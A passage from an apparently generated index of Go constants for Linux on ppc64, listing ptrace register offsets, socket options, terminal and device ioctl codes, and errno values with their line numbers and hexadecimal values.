PTRACE_SETVSRREGS (line 243) | PTRACE_SETVSRREGS = 0x1c constant PTRACE_SET_DEBUGREG (line 244) | PTRACE_SET_DEBUGREG = 0x1a constant PTRACE_SINGLEBLOCK (line 245) | PTRACE_SINGLEBLOCK = 0x100 constant PTRACE_SYSEMU (line 246) | PTRACE_SYSEMU = 0x1d constant PTRACE_SYSEMU_SINGLESTEP (line 247) | PTRACE_SYSEMU_SINGLESTEP = 0x1e constant PT_CCR (line 248) | PT_CCR = 0x26 constant PT_CTR (line 249) | PT_CTR = 0x23 constant PT_DAR (line 250) | PT_DAR = 0x29 constant PT_DSCR (line 251) | PT_DSCR = 0x2c constant PT_DSISR (line 252) | PT_DSISR = 0x2a constant PT_FPR0 (line 253) | PT_FPR0 = 0x30 constant PT_FPSCR (line 254) | PT_FPSCR = 0x50 constant PT_LNK (line 255) | PT_LNK = 0x24 constant PT_MSR (line 256) | PT_MSR = 0x21 constant PT_NIP (line 257) | PT_NIP = 0x20 constant PT_ORIG_R3 (line 258) | PT_ORIG_R3 = 0x22 constant PT_R0 (line 259) | PT_R0 = 0x0 constant PT_R1 (line 260) | PT_R1 = 0x1 constant PT_R10 (line 261) | PT_R10 = 0xa constant PT_R11 (line 262) | PT_R11 = 0xb constant PT_R12 (line 263) | PT_R12 = 0xc constant PT_R13 (line 264) | PT_R13 = 0xd constant PT_R14 (line 265) | PT_R14 = 0xe constant PT_R15 (line 266) | PT_R15 = 0xf constant PT_R16 (line 267) | PT_R16 = 0x10 constant PT_R17 (line 268) | PT_R17 = 0x11 constant PT_R18 (line 269) | PT_R18 = 0x12 constant PT_R19 (line 270) | PT_R19 = 0x13 constant PT_R2 (line 271) | PT_R2 = 0x2 constant PT_R20 (line 272) | PT_R20 = 0x14 constant PT_R21 (line 273) | PT_R21 = 0x15 constant PT_R22 (line 274) | PT_R22 = 0x16 constant PT_R23 (line 275) | PT_R23 = 0x17 constant PT_R24 (line 276) | PT_R24 = 0x18 constant PT_R25 (line 277) | PT_R25 = 0x19 constant PT_R26 (line 278) | PT_R26 = 0x1a constant PT_R27 (line 279) | PT_R27 = 0x1b constant PT_R28 (line 280) | PT_R28 = 0x1c constant PT_R29 (line 281) | PT_R29 = 0x1d constant PT_R3 (line 282) | PT_R3 = 0x3 constant PT_R30 (line 283) | PT_R30 = 0x1e constant PT_R31 (line 284) | PT_R31 = 0x1f constant PT_R4 (line 285) | PT_R4 = 0x4 constant PT_R5 (line 286) | PT_R5 = 0x5 constant PT_R6 (line 287) | PT_R6 = 0x6 constant PT_R7 (line 288) | PT_R7 = 0x7 constant PT_R8 (line 289) | PT_R8 = 0x8 constant PT_R9 (line 290) | PT_R9 = 0x9 constant PT_REGS_COUNT (line 291) | PT_REGS_COUNT = 0x2c constant PT_RESULT (line 292) | PT_RESULT = 0x2b constant PT_SOFTE (line 293) | PT_SOFTE = 0x27 constant PT_TRAP (line 294) | PT_TRAP = 0x28 constant PT_VR0 (line 295) | PT_VR0 = 0x52 constant PT_VRSAVE (line 296) | PT_VRSAVE = 0x94 constant PT_VSCR (line 297) | PT_VSCR = 0x93 constant PT_VSR0 (line 298) | PT_VSR0 = 0x96 constant PT_VSR31 (line 299) | PT_VSR31 = 0xd4 constant PT_XER (line 300) | PT_XER = 0x25 constant RLIMIT_AS (line 301) | RLIMIT_AS = 0x9 constant RLIMIT_MEMLOCK (line 302) | RLIMIT_MEMLOCK = 0x8 constant RLIMIT_NOFILE (line 303) | RLIMIT_NOFILE = 0x7 constant RLIMIT_NPROC (line 304) | RLIMIT_NPROC = 0x6 constant RLIMIT_RSS (line 305) | RLIMIT_RSS = 0x5 constant RNDADDENTROPY (line 306) | RNDADDENTROPY = 0x80085203 constant RNDADDTOENTCNT (line 307) | RNDADDTOENTCNT = 0x80045201 constant RNDCLEARPOOL (line 308) | RNDCLEARPOOL = 0x20005206 constant RNDGETENTCNT (line 309) | RNDGETENTCNT = 0x40045200 constant RNDGETPOOL (line 310) | RNDGETPOOL = 0x40085202 constant RNDRESEEDCRNG (line 311) | RNDRESEEDCRNG = 0x20005207 constant RNDZAPENTCNT (line 312) | RNDZAPENTCNT = 0x20005204 constant RTC_AIE_OFF (line 313) | RTC_AIE_OFF = 0x20007002 constant RTC_AIE_ON (line 314) | RTC_AIE_ON = 0x20007001 constant RTC_ALM_READ (line 315) | RTC_ALM_READ = 0x40247008 constant RTC_ALM_SET (line 316) | RTC_ALM_SET = 0x80247007 constant RTC_EPOCH_READ (line 317) | RTC_EPOCH_READ = 0x4008700d constant RTC_EPOCH_SET (line 318) | RTC_EPOCH_SET = 0x8008700e constant RTC_IRQP_READ (line 319) | RTC_IRQP_READ = 0x4008700b constant RTC_IRQP_SET (line 320) | RTC_IRQP_SET = 0x8008700c constant RTC_PARAM_GET (line 321) | RTC_PARAM_GET = 0x80187013 constant RTC_PARAM_SET (line 322) | RTC_PARAM_SET = 0x80187014 constant RTC_PIE_OFF (line 323) | RTC_PIE_OFF = 0x20007006 constant RTC_PIE_ON (line 324) | RTC_PIE_ON = 0x20007005 constant RTC_PLL_GET (line 325) | RTC_PLL_GET = 0x40207011 constant RTC_PLL_SET (line 326) | RTC_PLL_SET = 0x80207012 constant RTC_RD_TIME (line 327) | RTC_RD_TIME = 0x40247009 constant RTC_SET_TIME (line 328) | RTC_SET_TIME = 0x8024700a constant RTC_UIE_OFF (line 329) | RTC_UIE_OFF = 0x20007004 constant RTC_UIE_ON (line 330) | RTC_UIE_ON = 0x20007003 constant RTC_VL_CLR (line 331) | RTC_VL_CLR = 0x20007014 constant RTC_VL_READ (line 332) | RTC_VL_READ = 0x40047013 constant RTC_WIE_OFF (line 333) | RTC_WIE_OFF = 0x20007010 constant RTC_WIE_ON (line 334) | RTC_WIE_ON = 0x2000700f constant RTC_WKALM_RD (line 335) | RTC_WKALM_RD = 0x40287010 constant RTC_WKALM_SET (line 336) | RTC_WKALM_SET = 0x8028700f constant SCM_TIMESTAMPING (line 337) | SCM_TIMESTAMPING = 0x25 constant SCM_TIMESTAMPING_OPT_STATS (line 338) | SCM_TIMESTAMPING_OPT_STATS = 0x36 constant SCM_TIMESTAMPING_PKTINFO (line 339) | SCM_TIMESTAMPING_PKTINFO = 0x3a constant SCM_TIMESTAMPNS (line 340) | SCM_TIMESTAMPNS = 0x23 constant SCM_TXTIME (line 341) | SCM_TXTIME = 0x3d constant SCM_WIFI_STATUS (line 342) | SCM_WIFI_STATUS = 0x29 constant SECCOMP_IOCTL_NOTIF_ADDFD (line 343) | SECCOMP_IOCTL_NOTIF_ADDFD = 0x80182103 constant SECCOMP_IOCTL_NOTIF_ID_VALID (line 344) | SECCOMP_IOCTL_NOTIF_ID_VALID = 0x80082102 constant SECCOMP_IOCTL_NOTIF_SET_FLAGS (line 345) | SECCOMP_IOCTL_NOTIF_SET_FLAGS = 0x80082104 constant SFD_CLOEXEC (line 346) | SFD_CLOEXEC = 0x80000 constant SFD_NONBLOCK (line 347) | SFD_NONBLOCK = 0x800 constant SIOCATMARK (line 348) | SIOCATMARK = 0x8905 constant SIOCGPGRP (line 349) | SIOCGPGRP = 0x8904 constant SIOCGSTAMPNS_NEW (line 350) | SIOCGSTAMPNS_NEW = 0x40108907 constant SIOCGSTAMP_NEW (line 351) | SIOCGSTAMP_NEW = 0x40108906 constant SIOCINQ (line 352) | SIOCINQ = 0x4004667f constant SIOCOUTQ (line 353) | SIOCOUTQ = 0x40047473 constant SIOCSPGRP (line 354) | SIOCSPGRP = 0x8902 constant SOCK_CLOEXEC (line 355) | SOCK_CLOEXEC = 0x80000 constant SOCK_DGRAM (line 356) | SOCK_DGRAM = 0x2 constant SOCK_NONBLOCK (line 357) | SOCK_NONBLOCK = 0x800 constant SOCK_STREAM (line 358) | SOCK_STREAM = 0x1 constant SOL_SOCKET (line 359) | SOL_SOCKET = 0x1 constant SO_ACCEPTCONN (line 360) | SO_ACCEPTCONN = 0x1e constant SO_ATTACH_BPF (line 361) | SO_ATTACH_BPF = 0x32 constant SO_ATTACH_REUSEPORT_CBPF (line 362) | SO_ATTACH_REUSEPORT_CBPF = 0x33 constant SO_ATTACH_REUSEPORT_EBPF (line 363) | SO_ATTACH_REUSEPORT_EBPF = 0x34 constant SO_BINDTODEVICE (line 364) | SO_BINDTODEVICE = 0x19 constant SO_BINDTOIFINDEX (line 365) | SO_BINDTOIFINDEX = 0x3e constant SO_BPF_EXTENSIONS (line 366) | SO_BPF_EXTENSIONS = 0x30 constant SO_BROADCAST (line 367) | SO_BROADCAST = 0x6 constant SO_BSDCOMPAT (line 368) | SO_BSDCOMPAT = 0xe constant SO_BUF_LOCK (line 369) | SO_BUF_LOCK = 0x48 constant SO_BUSY_POLL (line 370) | SO_BUSY_POLL = 0x2e constant SO_BUSY_POLL_BUDGET (line 371) | SO_BUSY_POLL_BUDGET = 0x46 constant SO_CNX_ADVICE (line 372) | SO_CNX_ADVICE = 0x35 constant SO_COOKIE (line 373) | SO_COOKIE = 0x39 constant SO_DETACH_REUSEPORT_BPF (line 374) | SO_DETACH_REUSEPORT_BPF = 0x44 constant SO_DOMAIN (line 375) | SO_DOMAIN = 0x27 constant SO_DONTROUTE (line 376) | SO_DONTROUTE = 0x5 constant SO_ERROR (line 377) | SO_ERROR = 0x4 constant SO_INCOMING_CPU (line 378) | SO_INCOMING_CPU = 0x31 constant SO_INCOMING_NAPI_ID (line 379) | SO_INCOMING_NAPI_ID = 0x38 constant SO_KEEPALIVE (line 380) | SO_KEEPALIVE = 0x9 constant SO_LINGER (line 381) | SO_LINGER = 0xd constant SO_LOCK_FILTER (line 382) | SO_LOCK_FILTER = 0x2c constant SO_MARK (line 383) | SO_MARK = 0x24 constant SO_MAX_PACING_RATE (line 384) | SO_MAX_PACING_RATE = 0x2f constant SO_MEMINFO (line 385) | SO_MEMINFO = 0x37 constant SO_NETNS_COOKIE (line 386) | SO_NETNS_COOKIE = 0x47 constant SO_NOFCS (line 387) | SO_NOFCS = 0x2b constant SO_OOBINLINE (line 388) | SO_OOBINLINE = 0xa constant SO_PASSCRED (line 389) | SO_PASSCRED = 0x14 constant SO_PASSPIDFD (line 390) | SO_PASSPIDFD = 0x4c constant SO_PASSSEC (line 391) | SO_PASSSEC = 0x22 constant SO_PEEK_OFF (line 392) | SO_PEEK_OFF = 0x2a constant SO_PEERCRED (line 393) | SO_PEERCRED = 0x15 constant SO_PEERGROUPS (line 394) | SO_PEERGROUPS = 0x3b constant SO_PEERPIDFD (line 395) | SO_PEERPIDFD = 0x4d constant SO_PEERSEC (line 396) | SO_PEERSEC = 0x1f constant SO_PREFER_BUSY_POLL (line 397) | SO_PREFER_BUSY_POLL = 0x45 constant SO_PROTOCOL (line 398) | SO_PROTOCOL = 0x26 constant SO_RCVBUF (line 399) | SO_RCVBUF = 0x8 constant SO_RCVBUFFORCE (line 400) | SO_RCVBUFFORCE = 0x21 constant SO_RCVLOWAT (line 401) | SO_RCVLOWAT = 0x10 constant SO_RCVMARK (line 402) | SO_RCVMARK = 0x4b constant SO_RCVTIMEO (line 403) | SO_RCVTIMEO = 0x12 constant SO_RCVTIMEO_NEW (line 404) | SO_RCVTIMEO_NEW = 0x42 constant SO_RCVTIMEO_OLD (line 405) | SO_RCVTIMEO_OLD = 0x12 constant SO_RESERVE_MEM (line 406) | SO_RESERVE_MEM = 0x49 constant SO_REUSEADDR (line 407) | SO_REUSEADDR = 0x2 constant SO_REUSEPORT (line 408) | SO_REUSEPORT = 0xf constant SO_RXQ_OVFL (line 409) | SO_RXQ_OVFL = 0x28 constant SO_SECURITY_AUTHENTICATION (line 410) | SO_SECURITY_AUTHENTICATION = 0x16 constant SO_SECURITY_ENCRYPTION_NETWORK (line 411) | SO_SECURITY_ENCRYPTION_NETWORK = 0x18 constant SO_SECURITY_ENCRYPTION_TRANSPORT (line 412) | SO_SECURITY_ENCRYPTION_TRANSPORT = 0x17 constant SO_SELECT_ERR_QUEUE (line 413) | SO_SELECT_ERR_QUEUE = 0x2d constant SO_SNDBUF (line 414) | SO_SNDBUF = 0x7 constant SO_SNDBUFFORCE (line 415) | SO_SNDBUFFORCE = 0x20 constant SO_SNDLOWAT (line 416) | SO_SNDLOWAT = 0x11 constant SO_SNDTIMEO (line 417) | SO_SNDTIMEO = 0x13 constant SO_SNDTIMEO_NEW (line 418) | SO_SNDTIMEO_NEW = 0x43 constant SO_SNDTIMEO_OLD (line 419) | SO_SNDTIMEO_OLD = 0x13 constant SO_TIMESTAMPING (line 420) | SO_TIMESTAMPING = 0x25 constant SO_TIMESTAMPING_NEW (line 421) | SO_TIMESTAMPING_NEW = 0x41 constant SO_TIMESTAMPING_OLD (line 422) | SO_TIMESTAMPING_OLD = 0x25 constant SO_TIMESTAMPNS (line 423) | SO_TIMESTAMPNS = 0x23 constant SO_TIMESTAMPNS_NEW (line 424) | SO_TIMESTAMPNS_NEW = 0x40 constant SO_TIMESTAMPNS_OLD (line 425) | SO_TIMESTAMPNS_OLD = 0x23 constant SO_TIMESTAMP_NEW (line 426) | SO_TIMESTAMP_NEW = 0x3f constant SO_TXREHASH (line 427) | SO_TXREHASH = 0x4a constant SO_TXTIME (line 428) | SO_TXTIME = 0x3d constant SO_TYPE (line 429) | SO_TYPE = 0x3 constant SO_WIFI_STATUS (line 430) | SO_WIFI_STATUS = 0x29 constant SO_ZEROCOPY (line 431) | SO_ZEROCOPY = 0x3c constant TAB1 (line 432) | TAB1 = 0x400 constant TAB2 (line 433) | TAB2 = 0x800 constant TAB3 (line 434) | TAB3 = 0xc00 constant TABDLY (line 435) | TABDLY = 0xc00 constant TCFLSH (line 436) | TCFLSH = 0x2000741f constant TCGETA (line 437) | TCGETA = 0x40147417 constant TCGETS (line 438) | TCGETS = 0x402c7413 constant TCSAFLUSH (line 439) | TCSAFLUSH = 0x2 constant TCSBRK (line 440) | TCSBRK = 0x2000741d constant TCSBRKP (line 441) | TCSBRKP = 0x5425 constant TCSETA (line 442) | TCSETA = 0x80147418 constant TCSETAF (line 443) | TCSETAF = 0x8014741c constant TCSETAW (line 444) | TCSETAW = 0x80147419 constant TCSETS (line 445) | TCSETS = 0x802c7414 constant TCSETSF (line 446) | TCSETSF = 0x802c7416 constant TCSETSW (line 447) | TCSETSW = 0x802c7415 constant TCXONC (line 448) | TCXONC = 0x2000741e constant TFD_CLOEXEC (line 449) | TFD_CLOEXEC = 0x80000 constant TFD_NONBLOCK (line 450) | TFD_NONBLOCK = 0x800 constant TIOCCBRK (line 451) | TIOCCBRK = 0x5428 constant TIOCCONS (line 452) | TIOCCONS = 0x541d constant TIOCEXCL (line 453) | TIOCEXCL = 0x540c constant TIOCGDEV (line 454) | TIOCGDEV = 0x40045432 constant TIOCGETC (line 455) | TIOCGETC = 0x40067412 constant TIOCGETD (line 456) | TIOCGETD = 0x5424 constant TIOCGETP (line 457) | TIOCGETP = 0x40067408 constant TIOCGEXCL (line 458) | TIOCGEXCL = 0x40045440 constant TIOCGICOUNT (line 459) | TIOCGICOUNT = 0x545d constant TIOCGISO7816 (line 460) | TIOCGISO7816 = 0x40285442 constant TIOCGLCKTRMIOS (line 461) | TIOCGLCKTRMIOS = 0x5456 constant TIOCGLTC (line 462) | TIOCGLTC = 0x40067474 constant TIOCGPGRP (line 463) | TIOCGPGRP = 0x40047477 constant TIOCGPKT (line 464) | TIOCGPKT = 0x40045438 constant TIOCGPTLCK (line 465) | TIOCGPTLCK = 0x40045439 constant TIOCGPTN (line 466) | TIOCGPTN = 0x40045430 constant TIOCGPTPEER (line 467) | TIOCGPTPEER = 0x20005441 constant TIOCGRS485 (line 468) | TIOCGRS485 = 0x542e constant TIOCGSERIAL (line 469) | TIOCGSERIAL = 0x541e constant TIOCGSID (line 470) | TIOCGSID = 0x5429 constant TIOCGSOFTCAR (line 471) | TIOCGSOFTCAR = 0x5419 constant TIOCGWINSZ (line 472) | TIOCGWINSZ = 0x40087468 constant TIOCINQ (line 473) | TIOCINQ = 0x4004667f constant TIOCLINUX (line 474) | TIOCLINUX = 0x541c constant TIOCMBIC (line 475) | TIOCMBIC = 0x5417 constant TIOCMBIS (line 476) | TIOCMBIS = 0x5416 constant TIOCMGET (line 477) | TIOCMGET = 0x5415 constant TIOCMIWAIT (line 478) | TIOCMIWAIT = 0x545c constant TIOCMSET (line 479) | TIOCMSET = 0x5418 constant TIOCM_CAR (line 480) | TIOCM_CAR = 0x40 constant TIOCM_CD (line 481) | TIOCM_CD = 0x40 constant TIOCM_CTS (line 482) | TIOCM_CTS = 0x20 constant TIOCM_DSR (line 483) | TIOCM_DSR = 0x100 constant TIOCM_LOOP (line 484) | TIOCM_LOOP = 0x8000 constant TIOCM_OUT1 (line 485) | TIOCM_OUT1 = 0x2000 constant TIOCM_OUT2 (line 486) | TIOCM_OUT2 = 0x4000 constant TIOCM_RI (line 487) | TIOCM_RI = 0x80 constant TIOCM_RNG (line 488) | TIOCM_RNG = 0x80 constant TIOCM_SR (line 489) | TIOCM_SR = 0x10 constant TIOCM_ST (line 490) | TIOCM_ST = 0x8 constant TIOCNOTTY (line 491) | TIOCNOTTY = 0x5422 constant TIOCNXCL (line 492) | TIOCNXCL = 0x540d constant TIOCOUTQ (line 493) | TIOCOUTQ = 0x40047473 constant TIOCPKT (line 494) | TIOCPKT = 0x5420 constant TIOCSBRK (line 495) | TIOCSBRK = 0x5427 constant TIOCSCTTY (line 496) | TIOCSCTTY = 0x540e constant TIOCSERCONFIG (line 497) | TIOCSERCONFIG = 0x5453 constant TIOCSERGETLSR (line 498) | TIOCSERGETLSR = 0x5459 constant TIOCSERGETMULTI (line 499) | TIOCSERGETMULTI = 0x545a constant TIOCSERGSTRUCT (line 500) | TIOCSERGSTRUCT = 0x5458 constant TIOCSERGWILD (line 501) | TIOCSERGWILD = 0x5454 constant TIOCSERSETMULTI (line 502) | TIOCSERSETMULTI = 0x545b constant TIOCSERSWILD (line 503) | TIOCSERSWILD = 0x5455 constant TIOCSER_TEMT (line 504) | TIOCSER_TEMT = 0x1 constant TIOCSETC (line 505) | TIOCSETC = 0x80067411 constant TIOCSETD (line 506) | TIOCSETD = 0x5423 constant TIOCSETN (line 507) | TIOCSETN = 0x8006740a constant TIOCSETP (line 508) | TIOCSETP = 0x80067409 constant TIOCSIG (line 509) | TIOCSIG = 0x80045436 constant TIOCSISO7816 (line 510) | TIOCSISO7816 = 0xc0285443 constant TIOCSLCKTRMIOS (line 511) | TIOCSLCKTRMIOS = 0x5457 constant TIOCSLTC (line 512) | TIOCSLTC = 0x80067475 constant TIOCSPGRP (line 513) | TIOCSPGRP = 0x80047476 constant TIOCSPTLCK (line 514) | TIOCSPTLCK = 0x80045431 constant TIOCSRS485 (line 515) | TIOCSRS485 = 0x542f constant TIOCSSERIAL (line 516) | TIOCSSERIAL = 0x541f constant TIOCSSOFTCAR (line 517) | TIOCSSOFTCAR = 0x541a constant TIOCSTART (line 518) | TIOCSTART = 0x2000746e constant TIOCSTI (line 519) | TIOCSTI = 0x5412 constant TIOCSTOP (line 520) | TIOCSTOP = 0x2000746f constant TIOCSWINSZ (line 521) | TIOCSWINSZ = 0x80087467 constant TIOCVHANGUP (line 522) | TIOCVHANGUP = 0x5437 constant TOSTOP (line 523) | TOSTOP = 0x400000 constant TUNATTACHFILTER (line 524) | TUNATTACHFILTER = 0x801054d5 constant TUNDETACHFILTER (line 525) | TUNDETACHFILTER = 0x801054d6 constant TUNGETDEVNETNS (line 526) | TUNGETDEVNETNS = 0x200054e3 constant TUNGETFEATURES (line 527) | TUNGETFEATURES = 0x400454cf constant TUNGETFILTER (line 528) | TUNGETFILTER = 0x401054db constant TUNGETIFF (line 529) | TUNGETIFF = 0x400454d2 constant TUNGETSNDBUF (line 530) | TUNGETSNDBUF = 0x400454d3 constant TUNGETVNETBE (line 531) | TUNGETVNETBE = 0x400454df constant TUNGETVNETHDRSZ (line 532) | TUNGETVNETHDRSZ = 0x400454d7 constant TUNGETVNETLE (line 533) | TUNGETVNETLE = 0x400454dd constant TUNSETCARRIER (line 534) | TUNSETCARRIER = 0x800454e2 constant TUNSETDEBUG (line 535) | TUNSETDEBUG = 0x800454c9 constant TUNSETFILTEREBPF (line 536) | TUNSETFILTEREBPF = 0x400454e1 constant TUNSETGROUP (line 537) | TUNSETGROUP = 0x800454ce constant TUNSETIFF (line 538) | TUNSETIFF = 0x800454ca constant TUNSETIFINDEX (line 539) | TUNSETIFINDEX = 0x800454da constant TUNSETLINK (line 540) | TUNSETLINK = 0x800454cd constant TUNSETNOCSUM (line 541) | TUNSETNOCSUM = 0x800454c8 constant TUNSETOFFLOAD (line 542) | TUNSETOFFLOAD = 0x800454d0 constant TUNSETOWNER (line 543) | TUNSETOWNER = 0x800454cc constant TUNSETPERSIST (line 544) | TUNSETPERSIST = 0x800454cb constant TUNSETQUEUE (line 545) | TUNSETQUEUE = 0x800454d9 constant TUNSETSNDBUF (line 546) | TUNSETSNDBUF = 0x800454d4 constant TUNSETSTEERINGEBPF (line 547) | TUNSETSTEERINGEBPF = 0x400454e0 constant TUNSETTXFILTER (line 548) | TUNSETTXFILTER = 0x800454d1 constant TUNSETVNETBE (line 549) | TUNSETVNETBE = 0x800454de constant TUNSETVNETHDRSZ (line 550) | TUNSETVNETHDRSZ = 0x800454d8 constant TUNSETVNETLE (line 551) | TUNSETVNETLE = 0x800454dc constant UBI_IOCATT (line 552) | UBI_IOCATT = 0x80186f40 constant UBI_IOCDET (line 553) | UBI_IOCDET = 0x80046f41 constant UBI_IOCEBCH (line 554) | UBI_IOCEBCH = 0x80044f02 constant UBI_IOCEBER (line 555) | UBI_IOCEBER = 0x80044f01 constant UBI_IOCEBISMAP (line 556) | UBI_IOCEBISMAP = 0x40044f05 constant UBI_IOCEBMAP (line 557) | UBI_IOCEBMAP = 0x80084f03 constant UBI_IOCEBUNMAP (line 558) | UBI_IOCEBUNMAP = 0x80044f04 constant UBI_IOCMKVOL (line 559) | UBI_IOCMKVOL = 0x80986f00 constant UBI_IOCRMVOL (line 560) | UBI_IOCRMVOL = 0x80046f01 constant UBI_IOCRNVOL (line 561) | UBI_IOCRNVOL = 0x91106f03 constant UBI_IOCRPEB (line 562) | UBI_IOCRPEB = 0x80046f04 constant UBI_IOCRSVOL (line 563) | UBI_IOCRSVOL = 0x800c6f02 constant UBI_IOCSETVOLPROP (line 564) | UBI_IOCSETVOLPROP = 0x80104f06 constant UBI_IOCSPEB (line 565) | UBI_IOCSPEB = 0x80046f05 constant UBI_IOCVOLCRBLK (line 566) | UBI_IOCVOLCRBLK = 0x80804f07 constant UBI_IOCVOLRMBLK (line 567) | UBI_IOCVOLRMBLK = 0x20004f08 constant UBI_IOCVOLUP (line 568) | UBI_IOCVOLUP = 0x80084f00 constant VDISCARD (line 569) | VDISCARD = 0x10 constant VEOF (line 570) | VEOF = 0x4 constant VEOL (line 571) | VEOL = 0x6 constant VEOL2 (line 572) | VEOL2 = 0x8 constant VMIN (line 573) | VMIN = 0x5 constant VREPRINT (line 574) | VREPRINT = 0xb constant VSTART (line 575) | VSTART = 0xd constant VSTOP (line 576) | VSTOP = 0xe constant VSUSP (line 577) | VSUSP = 0xc constant VSWTC (line 578) | VSWTC = 0x9 constant VT1 (line 579) | VT1 = 0x10000 constant VTDLY (line 580) | VTDLY = 0x10000 constant VTIME (line 581) | VTIME = 0x7 constant VWERASE (line 582) | VWERASE = 0xa constant WDIOC_GETBOOTSTATUS (line 583) | WDIOC_GETBOOTSTATUS = 0x40045702 constant WDIOC_GETPRETIMEOUT (line 584) | WDIOC_GETPRETIMEOUT = 0x40045709 constant WDIOC_GETSTATUS (line 585) | WDIOC_GETSTATUS = 0x40045701 constant WDIOC_GETSUPPORT (line 586) | WDIOC_GETSUPPORT = 0x40285700 constant WDIOC_GETTEMP (line 587) | WDIOC_GETTEMP = 0x40045703 constant WDIOC_GETTIMELEFT (line 588) | WDIOC_GETTIMELEFT = 0x4004570a constant WDIOC_GETTIMEOUT (line 589) | WDIOC_GETTIMEOUT = 0x40045707 constant WDIOC_KEEPALIVE (line 590) | WDIOC_KEEPALIVE = 0x40045705 constant WDIOC_SETOPTIONS (line 591) | WDIOC_SETOPTIONS = 0x40045704 constant WORDSIZE (line 592) | WORDSIZE = 0x40 constant XCASE (line 593) | XCASE = 0x4000 constant XTABS (line 594) | XTABS = 0xc00 constant _HIDIOCGRAWNAME (line 595) | _HIDIOCGRAWNAME = 0x40804804 constant _HIDIOCGRAWPHYS (line 596) | _HIDIOCGRAWPHYS = 0x40404805 constant _HIDIOCGRAWUNIQ (line 597) | _HIDIOCGRAWUNIQ = 0x40404808 constant EADDRINUSE (line 602) | EADDRINUSE = syscall.Errno(0x62) constant EADDRNOTAVAIL (line 603) | EADDRNOTAVAIL = syscall.Errno(0x63) constant EADV (line 604) | EADV = syscall.Errno(0x44) constant EAFNOSUPPORT (line 605) | EAFNOSUPPORT = syscall.Errno(0x61) constant EALREADY (line 606) | EALREADY = syscall.Errno(0x72) constant EBADE (line 607) | EBADE = syscall.Errno(0x34) constant EBADFD (line 608) | EBADFD = syscall.Errno(0x4d) constant EBADMSG (line 609) | EBADMSG = syscall.Errno(0x4a) constant EBADR (line 610) | EBADR = syscall.Errno(0x35) constant EBADRQC (line 611) | EBADRQC = syscall.Errno(0x38) constant EBADSLT (line 612) | EBADSLT = syscall.Errno(0x39) constant EBFONT (line 613) | EBFONT = syscall.Errno(0x3b) constant ECANCELED (line 614) | ECANCELED = syscall.Errno(0x7d) constant ECHRNG (line 615) | ECHRNG = syscall.Errno(0x2c) constant ECOMM (line 616) | ECOMM = syscall.Errno(0x46) constant ECONNABORTED (line 617) | ECONNABORTED = syscall.Errno(0x67) constant ECONNREFUSED (line 618) | ECONNREFUSED = syscall.Errno(0x6f) constant ECONNRESET (line 619) | ECONNRESET = syscall.Errno(0x68) constant EDEADLK (line 620) | EDEADLK = syscall.Errno(0x23) constant EDEADLOCK (line 621) | EDEADLOCK = syscall.Errno(0x3a) constant EDESTADDRREQ (line 622) | EDESTADDRREQ = syscall.Errno(0x59) constant EDOTDOT (line 623) | EDOTDOT = syscall.Errno(0x49) constant EDQUOT (line 624) | EDQUOT = syscall.Errno(0x7a) constant EHOSTDOWN (line 625) | EHOSTDOWN = syscall.Errno(0x70) constant EHOSTUNREACH (line 626) | EHOSTUNREACH = syscall.Errno(0x71) constant EHWPOISON (line 627) | EHWPOISON = syscall.Errno(0x85) constant EIDRM (line 628) | EIDRM = syscall.Errno(0x2b) constant EILSEQ (line 629) | EILSEQ = syscall.Errno(0x54) constant EINPROGRESS (line 630) | EINPROGRESS = syscall.Errno(0x73) constant EISCONN (line 631) | EISCONN = syscall.Errno(0x6a) constant EISNAM (line 632) | EISNAM = syscall.Errno(0x78) constant EKEYEXPIRED (line 633) | EKEYEXPIRED = syscall.Errno(0x7f) constant EKEYREJECTED (line 634) | EKEYREJECTED = syscall.Errno(0x81) constant EKEYREVOKED (line 635) | EKEYREVOKED = syscall.Errno(0x80) constant EL2HLT (line 636) | EL2HLT = syscall.Errno(0x33) constant EL2NSYNC (line 637) | EL2NSYNC = syscall.Errno(0x2d) constant EL3HLT (line 638) | EL3HLT = syscall.Errno(0x2e) constant EL3RST (line 639) | EL3RST = syscall.Errno(0x2f) constant ELIBACC (line 640) | ELIBACC = syscall.Errno(0x4f) constant ELIBBAD (line 641) | ELIBBAD = syscall.Errno(0x50) constant ELIBEXEC (line 642) | ELIBEXEC = syscall.Errno(0x53) constant ELIBMAX (line 643) | ELIBMAX = syscall.Errno(0x52) constant ELIBSCN (line 644) | ELIBSCN = syscall.Errno(0x51) constant ELNRNG (line 645) | ELNRNG = syscall.Errno(0x30) constant ELOOP (line 646) | ELOOP = syscall.Errno(0x28) constant EMEDIUMTYPE (line 647) | EMEDIUMTYPE = syscall.Errno(0x7c) constant EMSGSIZE (line 648) | EMSGSIZE = syscall.Errno(0x5a) constant EMULTIHOP (line 649) | EMULTIHOP = syscall.Errno(0x48) constant ENAMETOOLONG (line 650) | ENAMETOOLONG = syscall.Errno(0x24) constant ENAVAIL (line 651) | ENAVAIL = syscall.Errno(0x77) constant ENETDOWN (line 652) | ENETDOWN = syscall.Errno(0x64) constant ENETRESET (line 653) | ENETRESET = syscall.Errno(0x66) constant ENETUNREACH (line 654) | ENETUNREACH = syscall.Errno(0x65) constant ENOANO (line 655) | ENOANO = syscall.Errno(0x37) constant ENOBUFS (line 656) | ENOBUFS = syscall.Errno(0x69) constant ENOCSI (line 657) | ENOCSI = syscall.Errno(0x32) constant ENODATA (line 658) | ENODATA = syscall.Errno(0x3d) constant ENOKEY (line 659) | ENOKEY = syscall.Errno(0x7e) constant ENOLCK (line 660) | ENOLCK = syscall.Errno(0x25) constant ENOLINK (line 661) | ENOLINK = syscall.Errno(0x43) constant ENOMEDIUM (line 662) | ENOMEDIUM = syscall.Errno(0x7b) constant ENOMSG (line 663) | ENOMSG = syscall.Errno(0x2a) constant ENONET (line 664) | ENONET = syscall.Errno(0x40) constant ENOPKG (line 665) | ENOPKG = syscall.Errno(0x41) constant ENOPROTOOPT (line 666) | ENOPROTOOPT = syscall.Errno(0x5c) constant ENOSR (line 667) | ENOSR = syscall.Errno(0x3f) constant ENOSTR (line 668) | ENOSTR = syscall.Errno(0x3c) constant ENOSYS (line 669) | ENOSYS = syscall.Errno(0x26) constant ENOTCONN (line 670) | ENOTCONN = syscall.Errno(0x6b) constant ENOTEMPTY (line 671) | ENOTEMPTY = syscall.Errno(0x27) constant ENOTNAM (line 672) | ENOTNAM = syscall.Errno(0x76) constant ENOTRECOVERABLE (line 673) | ENOTRECOVERABLE = syscall.Errno(0x83) constant ENOTSOCK (line 674) | ENOTSOCK = syscall.Errno(0x58) constant ENOTSUP (line 675) | ENOTSUP = syscall.Errno(0x5f) 